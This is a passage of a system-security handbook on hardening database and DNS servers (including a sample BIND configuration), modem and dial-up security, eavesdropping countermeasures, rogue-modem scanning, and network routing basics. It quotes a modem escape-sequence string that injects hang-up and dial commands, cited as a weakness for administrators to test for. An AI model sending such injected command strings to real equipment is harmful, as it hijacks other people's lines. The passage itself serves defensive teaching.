If you use a database back-end, it is important that you protect the database server itself. If the database server runs on the same host as the web server, ensure that it does not allow network access (for example, have it listen only on a Unix-domain socket or on the loopback address).
If the database server runs on a separate host, consider these protections:

· Configure your firewall or network topology so that it is impossible for people outside your organization to access your database server. For example, you may wish to set up your web server with two Ethernet adapters: one that connects to the Internet, and one that connects to a small firewall appliance that, in turn, connects to your database server. The firewall should be set up so that only database queries (the database's own port, from the web server's address) can pass between the web server and the database server.
· Make sure logins on the database server are limited. The individuals with login capabilities should be the system administrator and the database administrator.
· Make sure that the database server is backed up, physically protected, and maintained in the same way as your other secure servers.

Protection of the database itself is also necessary. When defining database users and access privileges, follow the principle of least privilege. If a CGI script only needs read access to a single table in a database, define a user with privileges restricted to only that access and have the script connect as that user. Some database software allows you to define very fine-grained permissions for users; in some cases, you can grant or restrict access to individual columns or rows in a given table, or provide different access to users based on where or how they connect. Take advantage of these protections.

Securing DNS Name Servers

Organizations rely on their DNS servers to provide accurate hostname-to-IP-address (and IP-address-to-hostname and hostname-to-hostname) translations for other systems on the Internet. Because every domain on the Internet must have an authoritative name server, and because the addresses of these name servers must be public to be useful, DNS servers are a natural point of attack for an intruder.
Because many applications use hostnames as the basis for access control lists, an attacker who can gain control of your DNS nameserver or corrupt its contents can often leverage that to break into your systems.

Besides individual hostname resolutions, DNS also provides a system for downloading a copy of the entire database from a nameserver. This process is called a zone transfer, and it is the process that secondary servers use to obtain a copy of the primary server's database.

DNS communicates over both UDP and TCP. Because UDP is a quick, packet-based protocol that allows for limited data transfer, it is typically used for the actual process of hostname resolution. TCP, meanwhile, is most commonly used for transactions that require large, reliable, and sustained data transfer, that is, zone transfers. However, individual queries can be made over TCP as well.

DNS zone transfers

Zone transfers can be a security risk, as they potentially give outsiders a complete list of all of an organization's computers connected to the internal network. Many sites choose to allow UDP DNS packets through their firewalls and routers, but explicitly block DNS zone transfers originating at external sites. This design is a compromise between safety and usability: it allows outsiders to determine the IP address of each internal computer, but only if the computer's name is already known.

You can block zone transfers with a router that can screen packets by blocking incoming TCP connections on port 53. Be aware that this also blocks legitimate DNS queries that use TCP, such as the retry a resolver makes when a response is too large to fit in a UDP packet, so it is a blunt instrument. Modern versions of the BIND nameserver implement an allow-transfer directive that allows you to specify the IP addresses of hosts (or the TSIG keys) that are allowed to perform zone transfers. This option is useful if you wish to allow zone transfers to a secondary nameserver that is not within your organization, but you don't want to allow zone transfers to anyone else.
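A BIND 9 named.conf fragment that applies the allow-transfer directive just described, together with the recursion, bogus-source and dynamic-update settings recommended later in this section. This is an added example and not configuration from the Handbook: the addresses, ACL names, key names and the secret placeholders are assumptions, and the key secrets would come from tsig-keygen (BIND 9.9 and later) or dnssec-keygen on older versions.

```conf
// Added example (not from the Handbook). Addresses and names are placeholders.
acl "internal"    { 127.0.0.1; 192.0.2.0/24; };   // our own networks
acl "secondaries" { 198.51.100.53; };              // the off-site secondary

// TSIG key shared with the secondary; both sides must hold the same secret.
key "xfer-key" {
    algorithm hmac-sha256;
    secret "REPLACE-WITH-THE-base64-OUTPUT-OF-tsig-keygen";
};

// Separate key for the host that is allowed to send dynamic updates.
key "dhcp-update" {
    algorithm hmac-sha256;
    secret "REPLACE-WITH-A-DIFFERENT-SECRET";
};

options {
    directory "/var/named";

    // Weak setting (the old default):  allow-transfer { any; };
    // Hardened: only a client presenting the TSIG key may pull the zone.
    allow-transfer { key "xfer-key"; };

    // Answer recursive queries only for our own hosts.
    allow-recursion { internal; };

    // Drop queries and responses from address ranges we never use.
    // Only list ranges that are genuinely unused at your site.
    blackhole { 10.0.0.0/8; 172.16.0.0/12; 192.168.0.0/16; };

    version "not disclosed";
};

zone "example.com" {
    type master;
    file "example.com.zone";
    // Dynamic updates must come from an internal address AND carry the key:
    // the inner list denies everything that is not internal, then the key
    // is required for what remains.
    allow-update { !{ !internal; any; }; key "dhcp-update"; };
};
```

After reloading, test from a host outside the internal ACL: dig @ns.example.com example.com axfr should end in "Transfer failed." rather than a zone listing, and a recursive query for a name you are not authoritative for should be refused, or at most answered with a referral, rather than resolved. The secondary keeps the same key "xfer-key" block and adds it to its server statement for the primary's address, so that its transfer requests are signed.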
DNS nameserver attacks

There are three fundamental ways that an attacker can cause a nameserver to serve incorrect information:

Loading erroneous information. Incorrect information can be fraudulently loaded into your nameserver's cache over the network, as a false reply to a query. This is often referred to as cache poisoning. If your nameserver has contact with the outside network, there is a possibility that attackers can exploit a programming bug or a configuration error to load your nameserver with erroneous information. The best way to protect your nameserver from these kinds of attacks is to isolate it from the outside network, so that no contact is made. If you have a firewall, you can achieve this isolation by running two nameservers: one in front of the firewall, and one behind it. The nameserver in front of the firewall contains only the names and IP addresses of your gateway computer; the nameserver behind the firewall contains the names and IP addresses of all of your internal hosts. If you couple these nameservers with static routing tables, damaging information is not likely to find its way into your nameservers. (Of course, depending on how you have built your firewall and what you allow your users to do on the network, this may not be a workable solution!)

Changing the configuration files. An attacker can change the nameserver's configuration files on the computer where your nameserver resides. To change your configuration files, an attacker must have access to the filesystem of the computer on which the nameserver is running and be able to modify the files. After the files are modified, the nameserver must be restarted. As the nameserver must typically be started as the superuser, an attacker would need to have superuser access on the server machine to carry out this attack. Unfortunately, by having control of your nameserver, a skillful attacker could use that control as a stepping stone to control of your entire network.
Furthermore, if the attacker does not have superuser access but can modify the nameserver files, then he can simply wait until the nameserver is restarted by somebody else, or until the system crashes and every program is restarted.

Using dynamic DNS. Modern DNS servers have facilities for dynamically updating DNS tables. This feature is very useful when IP addresses are dynamically assigned or shared among large numbers of people. Dynamic DNS allows a running DNS server to have its DNS tables updated without manually uploading a domain text file and asking the server to restart. However, an attacker can use the DNS dynamic update facility to provide your DNS server with a fraudulent update. To be secure, dynamic DNS updates must be properly authenticated; otherwise, an attacker could attack your system by simply changing the mapping between your domain names and IP addresses. Most dynamic DNS servers make provisions for authentication by IP address (only certain IP addresses are allowed to provide updates), through the use of a shared key (TSIG, RFC 2845), or through the use of updates that are signed with a public key algorithm (SIG(0), RFC 2931). In general, combining the IP source address check with one of the two cryptographic techniques provides the highest level of security; the address check alone is worthless against a spoofed UDP packet. If you enable dynamic DNS and it is not correctly implemented, an attacker may use it to update your server without your permission. Many domain name servers suffer a constant stream of fraudulent dynamic DNS update attempts.

DNSSEC

DNSSEC (RFC 2535 and RFC 3130; RFC 2535 has since been superseded by RFCs 4033 through 4035) is an extension to DNS that provides for the creation of a DNS-based Public Key Infrastructure (PKI) and the use of this infrastructure in the signing of DNS responses. DNSSEC is an interesting protocol.
Proponents have argued convincingly that the use of DNSSEC provides an easy way to bootstrap a global PKI that is not dependent upon certificates sold at high prices by centralized certificate authorities. Unfortunately, because of its populist nature and the fact that nobody really makes money when DNSSEC servers are deployed, at the time of writing there has been very little move to deploy DNSSEC on a widespread scale.

You can minimize the possibility of an attacker's modifying or subverting your nameserver by following these recommendations:

· Run your nameserver on a special computer that does not have user accounts.
· If you must run the nameserver on a computer that is used by ordinary users, make sure that the nameserver's files and directories are protected from other users. If your nameserver can be configured to run as a nonprivileged user (as modern versions of BIND can, with the -u option), you should take advantage of this option and keep the nameserver's files accessible only to that user.
· If your nameserver can be configured to run in a chroot jail area of the filesystem (as modern versions of BIND can, with the -t option), you can use this option to limit its access to other files on your host.
· Configure your nameserver to ignore requests from bogus IP ranges (such as 10.0.0.0/8 if your network doesn't use these addresses). In BIND, the blackhole directive in named.conf can be used to do this; note that it also discards responses arriving from the listed addresses.
· Configure your nameserver not to perform recursive DNS queries for outsiders. In a recursive query, if your DNS server can't find the information for the client, it issues its own queries to try to resolve it. When recursive queries are not allowed, it is up to the client to do the follow-up work. Recursive queries consume nameserver resources, expose your cache to poisoning by outsiders, and should not be performed for outsiders. In BIND, the allow-recursion directive controls which client hosts may request a recursive query.
· If you know of a specific site that is attempting to attack your nameserver, you can mark that server as bogus so that your nameserver will not send queries to it (the bogusns directive in BIND 4; a server statement with bogus yes for that address in BIND 8 and 9), or add the site to your firewall.
· If you use dynamic DNS updating facilities, require that updates be cryptographically authenticated with TSIG or SIG(0) signatures. Do not rely on IP addresses alone for authentication.

CHAPTER 7. NETWORK SECURITY

At a Glance

Few computers are standalone workstations; most are connected to other computers via modems, networks, or wireless communications. This chapter discusses security issues for administrators configuring computers to participate in networks. First, it examines how the computer connects to the network, with special attention to modems, routers, and wireless access. Then it focuses on network security issues for networks using TCP/IP, the predominant networking protocol on both local area networks and the Internet.

Modems

In this age of the Internet, there are still many reasons to be concerned with the security of modems and dialup services. Because dialup services are easy to set up and cheap to maintain, there are many that are still in operation, some of which have been in operation for a decade or more. Likewise, even with the wide availability of local area networks and high-speed connections, there are many reasons that you might wish to set up your own modem-based network connections. If people in your organization want to use the computer from their homes after hours or on weekends, a modem will allow them to do so. Administrators can do some remote maintenance and administration when they are "on call." If some people in your organization travel infrequently, or if they travel to rural areas, they might want to use a modem to access the computer when they're out of town, particularly if nationwide Internet service is not available or secure.
Despite these benefits, modems come with many risks. Because people routinely use modems to transmit their usernames and passwords, you should ensure that your modems and terminal servers are properly installed, behaving properly, and doing exactly what you think they are doing, and nothing else. Furthermore, because dialup services can be set up with a simple analog phone line or even a cell phone, they can be enabled by an individual without the knowledge or the authorization of an organization's management.

Modems are a remote access technology born of the 1960s, first deployed in the 1970s, and popularized in the 1980s and 1990s. Nevertheless, modems are still very much a part of the computing landscape today. Attackers know that they can break into many otherwise defended networks by finding modems that have not been properly secured. For this reason, security professionals must be familiar with modem security issues.

Modems and Security

Modems raise a number of security concerns because they create links between your computer and the outside world. Modems can be used by individuals inside your organization to remove confidential information. Modems can be used by people outside your organization to gain unauthorized access to your computer. If your modems can be reprogrammed or otherwise subverted, they can be used to trick your users into revealing their passwords. And, finally, an attacker can eavesdrop on a modem communication.

Despite the rise of the Internet, modems remain a popular tool for breaking into large corporate networks. The reason is simple: while corporations closely monitor their network connections, modems are largely unguarded and unaudited. To maximize security, modems should be provided by the organization and administered in a secure fashion.

The first step is to protect the modems themselves.
Be sure they are located in a physically secure location, so that no unauthorized individual can access them. The purpose of this protection is to prevent the modems from being altered or rewired. Some modems can have altered microcode or passwords loaded into them by someone with appropriate access, and you want to prevent such occurrences. You might make a note of the configuration switches (if any) on the modem, and periodically check them to be certain they remain unchanged.

Many modems sold these days allow remote configuration and testing. This capability makes changes simpler for personnel who manage several remote locations. It also makes abusing your modems simpler for an attacker. Therefore, be certain that such features, if present in your modems, are disabled.

The next most important aspect of protecting your modems is to protect their telephone numbers. Treat the telephone numbers for your modems the same way you treat your passwords: don't publicize them to anyone other than those who have a need to know. Making the telephone numbers for your modems widely known increases the chances that somebody might try to use them to break into your system. If your telephone system permits, change your modem numbers yearly, and request numbers that don't share the same prefix as your voice phones.

Unfortunately, you cannot keep the telephone numbers of your modems absolutely secret. After all, people do need to call them. And even if you were extremely careful with the numbers, an attacker could always discover the modem numbers by dialing every telephone number in your exchange. For this reason, simple secrecy isn't a solution; your modems need more stringent protection.

Banners

A banner is a message that is displayed by a modem (or the computer to which the modem is connected) when it is called. Some banners are displayed by the answering system before the caller types anything; other banners are displayed only after a person successfully authenticates.
Banners improve the usability of a system by letting callers know that they have reached the correct system. They can also include any necessary legal disclosures or notices. Unfortunately, banners can also be used by attackers: an attacker who scans a telephone exchange or a city can use banners to determine which organization's modems they have found. Avoid including the name of your organization, phone numbers or other contact information, or any information about your computer's operating system in the banner. You should also avoid any word that expresses "welcome", as this may be interpreted as an invitation to unauthorized users.

Here are some recommendations for what to put into your banner:

· State that unauthorized use of the system is prohibited and may be prosecuted. (Do not say that unauthorized use will be prosecuted. If some unauthorized users are prosecuted when others are not, the users who are prosecuted may be able to claim selective enforcement of this policy.)
· State that all users of the system may be monitored.
· Tell the user that he is agreeing to be monitored as a condition of using the computer system.
· In some cases, it is acceptable to display no banner at all before authentication.

Security Schemes

With today's telephone systems, if you connect your computer's modem to an outside telephone line, then anybody in the world can call it. Although usernames and passwords provide a degree of security, they are not foolproof. Users often pick bad passwords, and even good passwords can occasionally be guessed or discovered by other means. For this reason, a variety of special kinds of modems and modem use schemes have been developed that further protect computers from unauthorized access.

Password modems

These modems require the caller to enter a password before the modem connects the caller to the computer.
As with regular system passwords, the security provided by these modems can be defeated by repeated password guessing or by having an authorized person release his password to somebody who is not authorized. Usually, these modems can only store one to ten passwords. The password stored in the modem should not be the same as the password of any user.

Callback setups

A callback scheme is one in which an outsider calls your machine, connects to the modem, and provides some form of identification. The system then severs the connection and calls the outsider back at a predetermined phone number. Callback enhances security because the system will dial only preauthorized numbers, so an attacker cannot get the system to initiate a connection to his or her modem. Most callback modems can only store a few numbers to call back.

To operate properly, callback systems must completely disconnect the incoming call before placing the outgoing call. This can be surprisingly difficult on many phone lines, so it's better to use a different set of modems for the outgoing calls than are used to receive the incoming calls. Even a callback system that uses two modems can be subverted: if the attacker has subverted a phone company switch, he can install call forwarding on the phone number that the callback modem is programmed to dial, and forward those calls back to his own modem. Callback schemes can enhance your system's overall security, but you should not depend on them as your primary means of protection.

Encrypting modems

These modems, which must be used in pairs, encrypt all information transmitted and received over the telephone lines. Encrypting modems offer an extremely high degree of security not only against individuals attempting to gain unauthorized access, but also against wiretapping. Some encrypting modems contain preassigned cryptographic "keys" that work only in pairs. Other modems contain keys that can be changed on a routine basis, to further enhance security.
Many of the benefits afforded by encrypting modems can be had for less money by using cryptographic protocols over standard modems, such as SSH over a PPP connection.

Caller-ID

In many areas, you can purchase an additional telephone service called Caller-ID (CNID). As its name implies, Caller-ID identifies the phone number of each incoming telephone call. The phone number is usually displayed on a small box next to the telephone when the phone starts ringing. Many modems support Caller-ID directly. When these modems are properly programmed, they will provide Caller-ID information to the host computer when the information is received over the telephone lines. There are many ways that you can integrate Caller-ID with your remote access services:

· Some remote access systems can be programmed to accept the Caller-ID information directly and log the information for each incoming call along with the time and the username that was provided. The vast majority of remote access systems that support telephone lines delivered over ISDN Basic Rate, ISDN PRI, and T1 Flex-Path circuits include support for logging Caller-ID information in RADIUS accounting log files. (RADIUS, the Remote Authentication Dial In User Service, is a protocol designed to allow terminal servers to authenticate dial-up users against a remote database. It is described in RFC 2138, since superseded by RFC 2865.)
· Caller-ID can be very useful for tracking down perpetrators after a break-in. Unlike a username and password, which can be stolen and used by an unauthorized individual, Caller-ID information usually points back to the actual source of an attack (but see the caveat about telephone infrastructure below).
· If your remote access system does not handle Caller-ID, you can set up a second modem in parallel with the first on the same line. Program your computer to answer the first modem on the third or fourth ring.
Use a third-party Caller-ID logging program to capture the Caller-ID information from the second modem. You will then need to manually combine the two logs.
· ISDN and some other telephone systems offer yet another service called Restricted Calling Groups, which allows you to specify a list of phone numbers that are allowed to call your telephone number. All other callers are blocked.

Advanced telephone services such as these are only as secure as the underlying telephone network infrastructure: many corporate telephone systems allow the corporation to determine what Caller-ID information is displayed on the telephone instrument of the person being called, even for calls that terminate on other parts of the public switched telephone network. Attackers who have control of a corporate telephone system could program it to display whatever phone number they desire, potentially bypassing any security system that depends solely on Caller-ID or Restricted Calling Groups.

Physical intervention schemes

When modems are connected to hardware to allow off-site technicians to remotely maintain or troubleshoot it, you certainly want to prevent unauthorized users from connecting to these modems and reconfiguring your equipment. One simple and effective approach is to leave the modems unplugged from the phone line, and require off-site technicians to call your operator before performing maintenance (or, better yet, have the operator call the technician back at a known number, to make social engineering attacks less feasible). The operator connects the phone line for the technician's work (and notes this in a log book), and disconnects it thereafter.

One-Way Phone Lines

Many sites set up their modems and telephone lines so that they can both initiate and receive calls. This may seem like an economical way to make the most use of your modems and phone lines. However, this approach introduces significant security risks. Outgoing modems can be used to make free phone calls at your expense.
When both inbound and outbound calls are allowed on the same modems, attackers can subvert callback systems or tie up your outbound lines by using them for inbound connections. Your system will be more secure if you use separate modems for inbound and outbound traffic. In most environments the cost of the extra phone lines is minimal compared to the additional security and functionality provided by line separation.

You may further wish to routinely monitor the configuration of your telephone lines to check for the following conditions:

· Check to make sure that telephone lines that are not used to call long-distance telephone numbers cannot, in fact, place long-distance telephone calls. Don't subscribe to long-distance service on those lines.
· Check to make sure that telephone lines used only for inbound calls cannot place outbound calls.
· Check to make sure that telephone lines used only for outgoing calls cannot receive calls. Call forwarding (of all incoming calls to an operator or a disconnected number) is a typical way to ensure this.

Protection of Modems and Lines

Although physical protection is often overlooked, protecting the physical access to your telephone line is as important as securing the computer to which the telephone line and its modem are connected. Be sure to follow these guidelines:

Protect physical access to your telephone line. Be sure that your telephone line is physically secure. Lock all junction boxes. Place the telephone line itself in an electrical conduit, pulled through walls or at least located in locked areas. An intruder who gains physical access to your telephone line can attach his or her own modem to the line and intercept your telephone calls before they reach your computer. By spoofing your users, the intruder may learn their login names and passwords. Instead of intercepting your telephone calls, an intruder might simply monitor them, making a transcript of all of the information sent in either direction.
In this way, the intruder might learn passwords not only to your system, but also to all of the systems to which your users connect.

Make sure incoming telephone lines do not allow call forwarding. If your telephone can be programmed for call forwarding, an intruder can effectively transfer all incoming telephone calls to a number of his choosing. If there is a computer at the new number that has been programmed to act like your system, your users might be fooled into typing their usernames and passwords.

Have your telephone company disable third-party billing. Without third-party billing, people can't bill their calls to your modem line.

Consider using a leased line. If all your modem usage is to a single outside location, consider getting a leased line. A leased line is a dedicated circuit between two points provided by the phone company. It acts like a dedicated cable and cannot be used to place or receive calls. As such, it allows you to keep your connection with the remote site, but it does not allow someone to dial up your modem and attempt a break-in. Leased lines are more expensive than regular lines in most places, but the security may outweigh the cost. Leased lines offer another advantage: you can usually transfer data much faster over leased lines than over standard telephone lines.

Testing Modems

After a modem is connected, you should thoroughly test its ability to make and receive telephone calls. First, make sure that the modem behaves properly under normal operating circumstances. Next, make sure that when something unexpected happens, the computer behaves in a reasonable and responsible way. For example, if a telephone connection is lost, your computer should kill the associated processes and log the user out, rather than letting the next person who dials in access the previous command interpreter.
Most of this testing will ensure that your modem's control signals (in particular, carrier detect) are being properly sent to the computer, so that your computer knows when a call is in progress, as well as ensuring that your computer behaves properly with this information.

Originate testing

If you have configured your modem to place telephone calls, you need to verify that it always does the right thing when calls are placed as well as when they are disconnected. To test your modem, you must call another computer that you know behaves properly. (Do not place a call to the same computer that you are trying to call out from; if there are problems, you may not be able to tell where the problem lies.)

Test as follows:

1. Try calling the remote computer with a terminal emulation program. Each time the computer answers, you should get a login prompt. You should be able to log in and use the remote computer as if you were connected directly.
2. Hang up on the remote computer by pulling the telephone line out of the originating modem. Your terminal program should realize that the connection has been lost.
3. Call the remote computer again and this time hang up by turning off your modem. Again, your program should realize that something is wrong.
4. Call the remote computer again. This time, leave the telephone connection intact and exit your program. Your modem should automatically hang up on the remote computer.
5. Call the remote computer one last time. This time, do a software disconnect by killing the terminal process on your local computer (either from another terminal or with the Task Manager on Windows systems). Once again, your modem should automatically hang up on the remote computer.

Other things to check for dialing out include:

· Make sure there is no way to enter your modem's programming mode by sending an escape sequence.
An escape sequence is a sequence of characters that lets you reassert control over the modem and reprogram it. Most modems that use the "AT" command set (originally developed by the Hayes modem company), for example, can be forced into programming mode by allowing a three-second pause; sending three plus signs (+), the default escape character, in quick succession; and waiting another three seconds. If your modem prints "OK," then your modem's escape sequence is still active. Many Unix modem control programs disable the modem's escape sequence, but some do not. On some modems, for example, sending the sequence "+++\rATH0;ATDT611" causes the modem to hang up the phone and dial "611," the universal number for telephone repair. (While some modems require a 3-second pause between the "+++" and the "\r", other modems do not, because the 3-second pause was patented by Hayes, and many modem vendors chose not to license the patent.) If your modem's escape sequence is not disabled, consult your modem documentation or contact your modem vendor to determine how to disable the sequence. This step may require you to add some additional initialization sequence to the modem software or to set some configuration switches.
· Verify that your modems lock out concurrent access properly. Be sure that there is no way for one user to access a modem that is currently in use by another user.

If the terminal program does not exit when the telephone is disconnected, or if it is possible to return the modem to programming mode by sending an escape sequence, a user may be able to make telephone calls that are not logged. A user might even be able to reprogram the modem, causing it to call a specific phone number automatically, no matter what phone number it was instructed to call. At the other end, a Trojan horse might be waiting for your users. If the modem does not hang up the phone when the program exits, it can result in abnormally high telephone bills.
Perhaps more importantly, your user might remain logged into the remote machine. The next person who uses the program might gain access to that first user's account on the remote computer.

PART FIVE

Answer testing
To test your computer's answering ability, you need another computer or terminal with a second modem to call your computer. Test as follows:
1. Call your computer. It should answer the phone on the first few rings and offer a login banner. If your modem is set to cycle among various baud rates, you may need to press the BREAK or linefeed key on your terminal a few times to synchronize the answering modem's baud rate with the one that you are using. You should not press BREAK if you are using a modem that automatically selects baud rate.
2. Log in as usual. Then log out. Your computer should hang up the phone.
3. Call your computer and log in a second time. This time, hang up the telephone by pulling the telephone line out of the originating modem. This action simulates having the phone connection accidentally broken. Call your computer back on the same telephone number. You should get a new banner. You should not be reconnected to your old shell or session; that shell should have had its process destroyed when the connection was broken. The system must automatically log you out when the telephone connection is broken. Otherwise, if the telephone is accidentally hung up and somebody else calls your computer, that person will be able to type commands as if he were a legitimate user, without ever having to log in or enter a password.
4. If you have several modems connected to a hunt group (a pool of modems where the first non-busy one answers, and all calls are made to a single number), make sure that the group hunts properly. Many don't--which results in callers getting busy signals even when there are modems available.
Some stop hunting if they connect to a failed modem, rendering the rest of the group inaccessible.

Protecting Against Eavesdropping
Modems are susceptible to eavesdropping and wiretapping. Older modems, including data modems that are slower than 9600 baud and most fax modems, can be readily wiretapped using off-the-shelf hardware. Higher-speed modems can be eavesdropped upon using moderately sophisticated equipment that, while less readily available, can still be had for, at most, thousands of dollars.

Kinds of eavesdropping
There are basically six different places where a telephone conversation over a modem can be tapped. At your premises, an attacker can place a second modem or tape recorder in parallel with your existing instruments. Outside your window, it's possible to determine the information being sent over modems by analyzing the flashing of their transmit data and receive data lights. Between your premises and the telephone company central office, wires can be spliced. At the telephone company switch, a programmer can install an undetectable tap on a computer switch, or splice the line on a manual switch. If the call is routed over a satellite or microwave link, the radio transmission can be decoded. Finally, at the call's destination, a wiretap can be installed.

Eavesdropping countermeasures
There are several measures that you can take against electronic eavesdropping, with varying degrees of effectiveness:

Visually inspect your telephone line
Look for spliced wires, taps, or boxes that you cannot understand. Most eavesdropping by people who are not professionals is easy to detect.

Have your telephone line electronically "swept"
Using a device called a signal reflectometer, a trained technician can electronically detect any splices or junctions on your telephone line. Junctions may or may not be evidence of taps; in some areas, many telephone pairs have multiple arms that take them into several different neighborhoods.
If you do choose to sweep your line, you should do so on a regular basis. Detecting a change in a telephone line that has been watched over time is easier than looking at a line one time only and determining if the line has a tap on it. Sweeping may not detect certain kinds of taps, such as digital taps conducted by the telephone company for law enforcement agencies or other organizations, nor will it detect inductive taps.

Use cryptography
The best way to protect your communications from eavesdropping is to assume that your communications equipment is already compromised and to encrypt all the information as a preventative measure. If you use a dialup connection to the Internet, you can use cryptographic protocols such as SSL and SSH to form a cryptographic barrier that extends from your computer system to the remote server. VPN systems such as Point-to-Point Tunneling Protocol (PPTP) and IPsec can also be used to encrypt all communications between your computer and a remote server. A few years ago, cryptographic telephones or modems cost more than $1,000 and were only available to certain purchasers. Today, there are devices costing less than $300 that fit between a computer and a modem and create a cryptographically secure line. Most of these systems are based on private key cryptography and require that the system operator distribute a different key to each user. In practice, such restrictions pose no problem for most organizations. But there are also a growing number of public key systems that offer simple-to-use security that's still of the highest caliber. There are also many affordable modems that include built-in encryption and that require no special unit to work.
Preventing Unauthorized Modems with Telephone Scanning and Telephone Firewalls
Many organizations have policies that forbid the installation and operation of modems without specific permission from the site security manager. Each authorized modem is then audited on a regular basis to assure that it is correctly configured and that it complies with the site's policies regarding banners, usernames, passwords, and so forth. Because it is so easy to install a modem, many organizations have modems of which they are unaware. There are two ways to deal with the threat of these so-called rogue modems: telephone scanning and telephone firewalls.

Telephone scanning
You can use a program called a telephone scanner to locate unknown and unauthorized modems. A telephone scanner systematically calls every telephone number in a pre-defined range and notes the banners of the systems that answer. Some telephone scanners can be programmed to attempt to break into the computer systems that they find by using a predetermined list of usernames and passwords. There are both free and commercial telephone scanners available with a wide range of options. Additionally, some computer consulting firms will perform telephone scanning as part of a security audit.

Telephone firewalls
In some situations, the risk of penetration by modem is so high that simply scanning for unauthorized modems is not sufficient. In these situations, you may wish to use a telephone firewall to mediate telephone calls between your organization and the outside world. Similar to an Internet firewall, a telephone firewall is a device that is placed between your telephone system and an outside communications circuit. Typically, a telephone firewall is equipped with multiple ports for digital T1 telephone lines: instead of plugging a PBX into a T1 from a telephone company, the PBX is plugged into the telephone firewall, and the firewall is plugged into the exterior T1s.
A telephone firewall analyzes the content of every telephone conversation. If it detects modem tones originating or terminating at an extension that is not authorized to operate a modem, the call is terminated and the event is logged. Telephone firewalls can also be used to control fax machines, incoming phone calls, and even unauthorized use of long-distance calls and the use of 800 numbers and 900 services.

Limitations of scanning and firewalls
It is important to realize that neither telephone scanning nor telephone firewalls can do more than detect or control modems that use telephone lines that you know about. Suppose that your organization has a specific telephone exchange: in all likelihood, you will confine your telephone scanning and telephone firewall to that exchange. If some worker orders a separate telephone line from the phone company and pays for that line with his own funds, that phone number will not be within your organization's telephone exchange and will, therefore, not be detected by telephone scanning. Nor will it be subject to a telephone firewall. A cell phone connected to a modem is also not going to be within your defined exchange. In many cases, the only way to find rogue telephone lines is through a detailed physical inspection of wiring closets and other points where external telephone lines can enter an organization. In an environment that is rich with authorized wireless devices, it can be even harder to find unauthorized wireless devices.

Networks
Although telephone modems are still widely used to connect computers, millions of computers are connected to one another through higher-speed networks. From a practical viewpoint, computer users today usually divide the world of networking into two halves:

Local area networks
LANs are high-speed networks used to connect computers at a single location.
Although the original Ethernet network was a broadcast network that sent high-frequency transmissions over a coaxial cable, today the term Ethernet is widely taken to refer to a twisted-pair network assembled with hubs or switches that can transmit information at speeds of 10, 100, or 1,000 Mbps. Wireless networks that operate over a relatively short range--within an office or home--also constitute "local area networks." The protocols involved in either case are defined in standards developed by the Institute of Electrical and Electronics Engineers (IEEE). Two computers can also be directly connected to each other with a serial line. IP packets are then sent using PPP (Point-to-Point Protocol), SLIP (Serial Line Internet Protocol), or CSLIP (Compressed SLIP). If each computer is, in turn, connected to a local area network, the serial line can bridge together the two LANs.

Wide area networks
WANs are typically slower-speed networks that organizations use to connect their LANs. WANs are often built from leased telephone lines and long-distance data circuits (which may transit satellite links, microwave connections, and fiber optic cables) capable of moving data at speeds between 56 Kbps and gigabits per second. A WAN might bridge a company's offices on either side of a town or on either side of a continent. Some WANs are shared by several organizations. A special kind of WAN link that's become increasingly popular is the Virtual Private Network (VPN). The VPN is a virtual network because the packets travel over the Internet (or some other public network); it's a private network because the data in the packets is encrypted to prevent anyone on the public network from reading it or tampering with it. A VPN can connect multiple locations much more cheaply than leasing lines between them.

One of the first computer networks was the ARPANET, developed in the early 1970s by universities and corporations working under contract to the U.S.
Department of Defense's Advanced Research Projects Agency (ARPA or DARPA). The ARPANET linked computers around the world and served as a backbone for many other regional and campus-wide networks that sprang up in the 1980s.

Today, the descendant of the ARPANET is known as the Internet. The Internet is an IP-based network that encompasses hundreds of millions of computers and more than a billion users throughout the world. Some of these computer systems are constantly connected, while others are connected only intermittently. Any one of those users can try to send you electronic mail, exchange files with your FTP file server, or break into your system--if your system is configured to allow them the access necessary to do so.

Gateways and Routers
Despite the complexity of the Internet and IP addressing, computers can easily send each other messages across the global network. To send a packet, most computers simply set the packet's destination address and then send the packet to a computer on their local network called a gateway. If the gateway makes a determination of where to send the packet next, the gateway is a router. The router takes care of sending the packet to its final destination by forwarding the packet to a directly connected gateway that is (supposed to be) one step closer to the destination host.

Many organizations configure their internal networks as a large tree. At the root of the tree is the organization's connection to the Internet. When a gateway receives a packet, it decides whether to send it to one of its own subnetworks or direct it towards the root. Out on the Internet, major IP providers have far more complicated networks with sophisticated routing algorithms and specialized routing protocols. Many of these providers have redundant networks so that if one link malfunctions, other links can take over.
Small office and home users can easily purchase 4-port and 8-port Ethernet routers that are designed to connect to a broadband DSL or cable modem connection and route packets between the home computers and the broadband modem (and from thence to the Internet). An important feature of these devices (and one that is also supported by high-end routers) is Network Address Translation (NAT). NAT is a general system for translating IP addresses in data packets received by the router to other addresses before (or after) the packet's destination is chosen by the router and the packet is sent out to that destination. It is most commonly used to allow several internal computers with private (nonroutable) IP addresses to share a single external (public) IP address, or to translate public IP addresses for groups of computers into corresponding private IP addresses on an internal network. Because the internal IP addresses cannot be reached directly from the public Internet (because no other routers will be able to correctly route them), NAT schemes provide some protection against outsiders initiating connections to internal machines, while still making it possible for the internal machines to initiate and maintain connections to the Internet.

A second feature of high-end routers is the ability to establish a Virtual Private Network (VPN) between two LANs in separate locations (e.g., two branch offices). Pairs of routers create VPNs between them using protocols like IPsec, and then route traffic between the LANs through the VPN rather than over the unprotected Internet.

Routers often represent the border of an organization's network security perimeter, as well as a point of vulnerability. If a router is subverted, attackers can redirect packets intended for the organization elsewhere, or gain inappropriate access to internal hosts or network layout information. Each router vendor offers different programming features, which can make securing routers a challenge.
A recommended practice is to insure that routers can only be programmed by those with physical access (to a terminal connected by a serial cable, for example), and not through the network. Router configuration menus should always be password-protected, and if routers are to be SNMP-managed, read access to the router should be password-protected and write access disabled.

Border routers should be equipped with egress filters so that they will not send packets out of a network unless the packet has a valid source IP address located within the network. They should also be configured with ingress filters to insure that packets claiming to be from within the network will not be accepted on the router's external interface and routed into the network.

External Firewalls
A firewall is a device that is designed to prevent traffic from flowing between two networks, with the exception of traffic passing through designated "holes" in the firewall. Firewalls are typically divided into two types: packet filters and application gateways.

